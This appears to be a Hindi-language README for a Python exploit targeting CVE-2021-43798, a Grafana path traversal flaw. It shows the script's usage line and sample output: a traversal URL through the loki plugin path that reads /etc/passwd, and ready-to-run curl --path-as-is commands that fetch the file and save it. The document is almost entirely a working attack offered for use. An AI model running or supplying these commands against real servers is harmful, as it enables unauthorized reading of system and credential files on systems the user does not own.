
# CVE-2021-43798 के लिए Python एक्सप्लॉइट, एक Grafana पाथ ट्रैवर्सल भेद्यता जो प्लगइन URL में डायरेक्टरी ट्रैवर्सल के माध्यम से मनमाना फ़ाइल पढ़ने में सक्षम बनाती है।
usage: grafana-exploit.py [-h] -H/--host HOST grafana-exploit.py: error: the following arguments are required: -H/--host
उदाहरण: python3 grafana-exploit.py --host <target_host>
यदि arbitary-file स्थिति को सफलतापूर्वक पढ़ लिया जाए request URL और curl कमांड दिखाएँ
[+]RequestURL
http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd
[+]curl_command
curl --path-as-is "http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd"
इसलिए यदि आप फ़ाइल डाउनलोड करना चाहते हैं, तो ऊपर दिए अनुसार कमांड चलाएँ
curl --path-as-is "http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd" -o passwd